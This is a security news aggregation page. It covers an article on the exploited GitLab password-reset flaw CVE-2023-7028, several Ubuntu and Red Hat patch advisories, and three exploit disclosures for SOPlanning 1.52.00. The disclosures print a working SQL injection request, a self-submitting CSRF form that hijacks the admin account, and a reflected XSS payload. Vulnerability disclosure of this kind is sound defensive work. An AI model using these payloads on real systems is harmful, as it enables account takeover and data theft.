Patch now: Cyberattackers are exploiting CVE-2023-7028 (CVSS 10) to take over and lock users out of GitLab accounts, steal source code, and more.

Source: simon de glanville via Alamy Stock Photo

A critical security vulnerability in GitLab is under active attack, according to CISA. It allows bad actors to send password reset emails for any account to an email address of their choice, thus paving the way for account takeover.

"This will allow attackers to reset the password just as if they were a user that had legitimately forgotten theirs," says Erich Kron, security awareness advocate at KnowBe4. "From there, the account would belong to the bad actors."

Further, Kron warned that if adversaries choose to change the legitimate associated email address for a GitLab account they've infiltrated, they could then keep the rightful account owner from being able to log in or use the password recovery function to change it back.

CISA added the vulnerability, CVE-2023-7028, to its Known Exploited Vulnerabilities (KEV) catalog as a "GitLab Community and Enterprise Editions Improper Access Control Vulnerability." The agency noted that the bug is maximum severity with a 10 out of 10 CVSS vulnerability-severity score, and is requiring Federal Civilian Executive Branch (FCEB) agencies to remediate FCEB networks against the active threat.

Sajeeb Lohani, senior director of cybersecurity at Bugcrowd, said there are publicly available exploits for the bug as well, so defenders shouldn't sit on this one.

"Since the exploit itself is quite simple to pull off, the bar of entry for the exploit is low, implying less skilled hackers will also be able to exploit this issue," he says. "In simple terms, this is an issue you want to patch promptly."

**CVE-2023-7028: Risk of Proprietary Data, Code Theft**

David Brumley, cybersecurity professor at Carnegie Mellon and CEO of ForAllSecure, explains that the stakes are high for organizations because GitLab stores source code and proprietary data.

"There's always the risk of an attacker injecting malicious code into the supply chain as well, but that requires the changes not being flagged elsewhere," he explains. "While data exfiltration typically won't run up against other checks, the point of a source control platform is that you can easily transfer code in and out of it to local machines."

He recommended that organizations that manage their own GitLab deployments should ensure they have a plan to upgrade to a patched version if they haven't already done so.

"If that can't be done immediately, then mitigations should be employed," he says. "You need to ensure that you have regular password rotation or use a separate identity provider for authentication."

Larger organizations may want to also consider tools that can identify anomalous activity based on user actions, which could flag compromised accounts for quarantine.

**MFA, Zero Trust Are Effective Counters**

Defending against these types of attacks goes back to security basics. For instance, Kron suggests that one of the most effective ways to counter attacks such as unauthorized password changes is the use of multifactor authentication (MFA), which attackers keep trying to circumvent.

He added that while MFA is not unhackable, it can add enough complexity to the account takeover process that the bad actors may fail.

"Even if they could reset your password, they will not be able to log in without the second factor," he says. "This could prevent them from changing the recovery email address, making them unable to lock the rightful account owner out."

Patrick Tiquet, vice president of security and architecture at Keeper Security, meanwhile notes the most effective method to prevent account-based cyberattacks is to invest in a zero-trust and zero-knowledge cybersecurity architecture that will limit, if not altogether prevent, a bad actor's access.

He also says a privileged access management (PAM) solution is imperative for IT administrators and security personnel to manage and secure privileged credentials and ensure least-privilege access.

"Additionally, each organization's patch management strategy needs to have a fast track for critical vulnerabilities with high possible severities — like this one — to ensure they can immediately take action," Tiquet says.

**About the Author(s)**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Critical GitLab Bug Under Exploit Enables Account Takeover, CISA Warns

Ubuntu Security Notice 6757-2 - USN-6757-1 fixed vulnerabilities in PHP. Unfortunately these fixes were incomplete for Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.10. This update fixes the problem. It was discovered that PHP incorrectly handled PHP_CLI_SERVER_WORKERS variable. An attacker could possibly use this issue to cause a crash or execute arbitrary code. This issue only affected Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6757-2  
May 02, 2024

php7.4, php8.1, php8.2 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.2: server-side, HTML-embedded scripting language (metapackage)  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter

Details:

USN-6757-1 fixed vulnerabilities in PHP. Unfortunately these fixes were incomplete for  
Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.10. This update fixes the problem.

Original advisory details:

 It was discovered that PHP incorrectly handled PHP_CLI_SERVER_WORKERS variable.  
 An attacker could possibly use this issue to cause a crash or execute  
 arbitrary code. This issue only affected Ubuntu 20.04 LTS, and  
 Ubuntu 22.04 LTS. (CVE-2022-4900)

 It was discovered that PHP incorrectly handled certain cookies.  
 An attacker could possibly use this issue to cookie by pass.  
 (CVE-2024-2756)

 It was discovered that PHP incorrectly handled some passwords.  
 An attacker could possibly use this issue to cause an account takeover  
 attack. (CVE-2024-3096)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10  
  libapache2-mod-php8.2           8.2.10-2ubuntu2.1  
  php8.2                          8.2.10-2ubuntu2.1  
  php8.2-cgi                      8.2.10-2ubuntu2.1  
  php8.2-cli                      8.2.10-2ubuntu2.1  
  php8.2-fpm                      8.2.10-2ubuntu2.1  
  php8.2-xml                      8.2.10-2ubuntu2.1

Ubuntu 22.04 LTS  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.17  
  php8.1                          8.1.2-1ubuntu2.17  
  php8.1-cgi                      8.1.2-1ubuntu2.17  
  php8.1-cli                      8.1.2-1ubuntu2.17  
  php8.1-fpm                      8.1.2-1ubuntu2.17  
  php8.1-xml                      8.1.2-1ubuntu2.17

Ubuntu 20.04 LTS  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.22  
  php7.4                          7.4.3-4ubuntu2.22  
  php7.4-cgi                      7.4.3-4ubuntu2.22  
  php7.4-cli                      7.4.3-4ubuntu2.22  
  php7.4-fpm                      7.4.3-4ubuntu2.22  
  php7.4-xml                      7.4.3-4ubuntu2.22

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6757-2  
  https://ubuntu.com/security/notices/USN-6757-1  
  CVE-2022-4900, CVE-2024-2756, CVE-2024-3096

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.2/8.2.10-2ubuntu2.1  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.17  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.22

Ubuntu Security Notice USN-6757-2

Ubuntu Security Notice 6762-1 - It was discovered that GNU C Library incorrectly handled netgroup requests. An attacker could possibly use this issue to cause a crash or execute arbitrary code. This issue only affected Ubuntu 14.04 LTS. It was discovered that GNU C Library might allow context-dependent attackers to cause a denial of service. This issue only affected Ubuntu 14.04 LTS. It was discovered that GNU C Library when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution. This issue only affected Ubuntu 14.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6762-1May 02, 2024eglibc, glibc vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTS- Ubuntu 14.04 LTSSummary:Several security issues were fixed in GNU C Library.Software Description:- glibc: GNU C Library- eglibc: GNU C LibraryDetails:It was discovered that GNU C Library incorrectly handled netgroup requests.An attacker could possibly use this issue to cause a crash or execute arbitrary code.This issue only affected Ubuntu 14.04 LTS. (CVE-2014-9984)It was discovered that GNU C Library might allow context-dependentattackers to cause a denial of service. This issue only affected Ubuntu 14.04 LTS.(CVE-2015-20109)It was discovered that GNU C Library when processing very long pathname arguments tothe realpath function, could encounter an integer overflow on 32-bitarchitectures, leading to a stack-based buffer overflow and, potentially,arbitrary code execution. This issue only affected Ubuntu 14.04 LTS.(CVE-2018-11236)It was discovered that the GNU C library getcwd function incorrectlyhandled buffers. An attacker could use this issue to cause the GNU CLibrary to crash, resulting in a denial of service, or possibly executearbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2021-3999)Charles Fol discovered that the GNU C Library iconv feature incorrectlyhandled certain input sequences. An attacker could use this issue to causethe GNU C Library to crash, resulting in a denial of service, or possiblyexecute arbitrary code. (CVE-2024-2961)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  libc6                           2.27-3ubuntu1.6+esm2                                  Available with Ubuntu ProUbuntu 16.04 LTS  libc6                           2.23-0ubuntu11.3+esm6                                  Available with Ubuntu ProUbuntu 14.04 LTS  libc6                           2.19-0ubuntu6.15+esm3                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.References:  https://ubuntu.com/security/notices/USN-6762-1  CVE-2014-9984, CVE-2015-20109, CVE-2018-11236, CVE-2021-3999,  CVE-2024-2961, https://launchpad.net/bugs/2063328

Ubuntu Security Notice USN-6762-1

SOPlanning version 1.52.00 suffers from a remote SQL injection vulnerability in projects.php.

    Exploit Title: SOPlanning v1.52.00 'projets.php' SQLiApplication: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the 'projects.php' page.Instructions: Authenticate to the host, the credentials can be obtained using a CSRF exploit (more info included). Once valid credentials are obtained use either a GET/POST request to send the valid parameters that equal to valid SQLi.Vulnerable request parameters for request to "/www/projets.php":filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=testThe above parameters can be sent as either a valid GET/POST request to trigger the SQLi.Example Curl Request To Re-Test SQLi:curl -i -s -k -X $'POST' \    -H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://127.0.0.1<http://127.0.0.1/>' -H $'Connection: close' -H $'Referer: http://127.0.0.1/soplanning/www/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \    -b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D' \    --data-binary $'filtreGroupeProjet=1&statut[]=todo\'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+\'Liquidsky\'=\'Liquidsky&rechercheProjet=test' \    $'http://127.0.0.1/soplanning/www/projets.php'  Note: Cookies need to be authenticated and request needs to be valid for valid SQLi. This curl request can be used with a proxy to reconstruct a valid request.

SOPlanning 1.52.00 SQL Injection

SOPlanning version 1.52.00 suffers from a cross site request forgery vulnerability in xajax_server.php.

<html>  <body>    <form action=https://fuzzlove.website/www/process/xajax_server.php method="POST">      <input type="hidden" name="xajax" value="submitFormProfil" />      <input type="hidden" name="xajaxr" value="" />      <input type="hidden" name="xajaxargs[]" value="ADM" />      <input type="hidden" name="xajaxargs[]" value=pwn@mail.lv<mailto:pwn@mail.lv> />      <input type="hidden" name="xajaxargs[]" value="password" />      <input type="hidden" name="xajaxargs[]" value="fr" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="false" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="true" />      <input type="hidden" name="xajaxargs[]" value="false" />      <input type="hidden" name="xajaxargs[]" value="0" />      <input type="hidden" name="xajaxargs[]" value="1" />    </form>    <script>      document.forms[0].submit();    </script>  </body></html>

SOPlanning 1.52.00 Cross Site Request Forgery

SOPlanning version 1.52.00 suffers from a cross site scripting vulnerability in groupe_save.php.

Exploit Title: SOPlanning v1.52.00 'groupe_save.php' XSS (Reflected XSS)Application: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.Example Payload:"><script>alert('LiQUiDSKY')</script><!--Reflected XSS: /soplanning/www/process/groupe_save.php?saved=1&groupe_id="><script>alert('LiQUiDSKY')</script><!--&nom=Project+NewAnalysis: The landing page takes into consideration the user input then redirects to a page where the XSS is shown the payload included in the exploit, escapes the variable where it is held, and comments out the rest to perform a valid reflected XSS attack against any authenticated user the payload was sent to.

SOPlanning 1.52.00 Cross Site Scripting

Red Hat Security Advisory 2024-2679-03 - An update for libxml2 is now available for Red Hat Enterprise Linux 9. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2679.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libxml2 security updateAdvisory ID:        RHSA-2024:2679-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2679Issue date:         2024-05-02Revision:           03CVE Names:          CVE-2024-25062====================================================================Summary: An update for libxml2 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The libxml2 library is a development toolbox providing the implementation of various XML standards.Security Fix(es):* libxml2: use-after-free in XMLReader (CVE-2024-25062)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-25062References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2262726

Red Hat Security Advisory 2024-2679-03

Red Hat Security Advisory 2024-2674-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2674.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: kernel security and bug fix updateAdvisory ID:        RHSA-2024:2674-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:2674Issue date:         2024-05-02Revision:           03CVE Names:          CVE-2020-36516====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security fixes:* kernel: mlxsw: spectrum_acl_tcam: Fix stack corruption (CVE-2024-26586)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2020-36516References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2059928https://bugzilla.redhat.com/show_bug.cgi?id=2265645

Red Hat Security Advisory 2024-2674-03

Red Hat Security Advisory 2024-2071-03 - Red Hat OpenShift Container Platform release 4.15.11 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2071.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.15.11 packages and security update  
Advisory ID:        RHSA-2024:2071-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2071  
Issue date:         2024-05-02  
Revision:           03  
CVE Names:          CVE-2024-28180  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.11 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.15.11. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:2068

Security Fix(es):

* jose-go: improper handling of highly compressed data (CVE-2024-28180)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

CVEs:

CVE-2024-28180

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854

Red Hat Security Advisory 2024-2071-03

Red Hat Security Advisory 2024-2068-03 - Red Hat OpenShift Container Platform release 4.15.11 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2068.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.15.11 bug fix and security update  
Advisory ID:        RHSA-2024:2068-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2068  
Issue date:         2024-05-02  
Revision:           03  
CVE Names:          CVE-2023-45288  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.11 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.11. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:2071

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames  
causes DoS (CVE-2023-45288)  
* ironic-image: Unauthenticated local access to Ironic API (CVE-2024-31463)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45288

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273  
https://bugzilla.redhat.com/show_bug.cgi?id=2275847  
https://issues.redhat.com/browse/OCPBUGS-22926  
https://issues.redhat.com/browse/OCPBUGS-27948  
https://issues.redhat.com/browse/OCPBUGS-29092  
https://issues.redhat.com/browse/OCPBUGS-30970  
https://issues.redhat.com/browse/OCPBUGS-31045  
https://issues.redhat.com/browse/OCPBUGS-31324  
https://issues.redhat.com/browse/OCPBUGS-31641  
https://issues.redhat.com/browse/OCPBUGS-31686  
https://issues.redhat.com/browse/OCPBUGS-31802  
https://issues.redhat.com/browse/OCPBUGS-31806  
https://issues.redhat.com/browse/OCPBUGS-31811  
https://issues.redhat.com/browse/OCPBUGS-31820  
https://issues.redhat.com/browse/OCPBUGS-31830  
https://issues.redhat.com/browse/OCPBUGS-31839  
https://issues.redhat.com/browse/OCPBUGS-31842  
https://issues.redhat.com/browse/OCPBUGS-31924  
https://issues.redhat.com/browse/OCPBUGS-32024  
https://issues.redhat.com/browse/OCPBUGS-32093  
https://issues.redhat.com/browse/OCPBUGS-32097  
https://issues.redhat.com/browse/OCPBUGS-32114  
https://issues.redhat.com/browse/OCPBUGS-32164  
https://issues.redhat.com/browse/OCPBUGS-32173  
https://issues.redhat.com/browse/OCPBUGS-32191  
https://issues.redhat.com/browse/OCPBUGS-32246  
https://issues.redhat.com/browse/OCPBUGS-32299  
https://issues.redhat.com/browse/OCPBUGS-32311  
https://issues.redhat.com/browse/OCPBUGS-32340  
https://issues.redhat.com/browse/OCPBUGS-32355  
https://issues.redhat.com/browse/OCPBUGS-32357  
https://issues.redhat.com/browse/OCPBUGS-32396  
https://issues.redhat.com/browse/OCPBUGS-32399  
https://issues.redhat.com/browse/OCPBUGS-32414  
https://issues.redhat.com/browse/OCPBUGS-32435  
https://issues.redhat.com/browse/OCPBUGS-32498  
https://issues.redhat.com/browse/OCPBUGS-32518

Tag

#vulnerability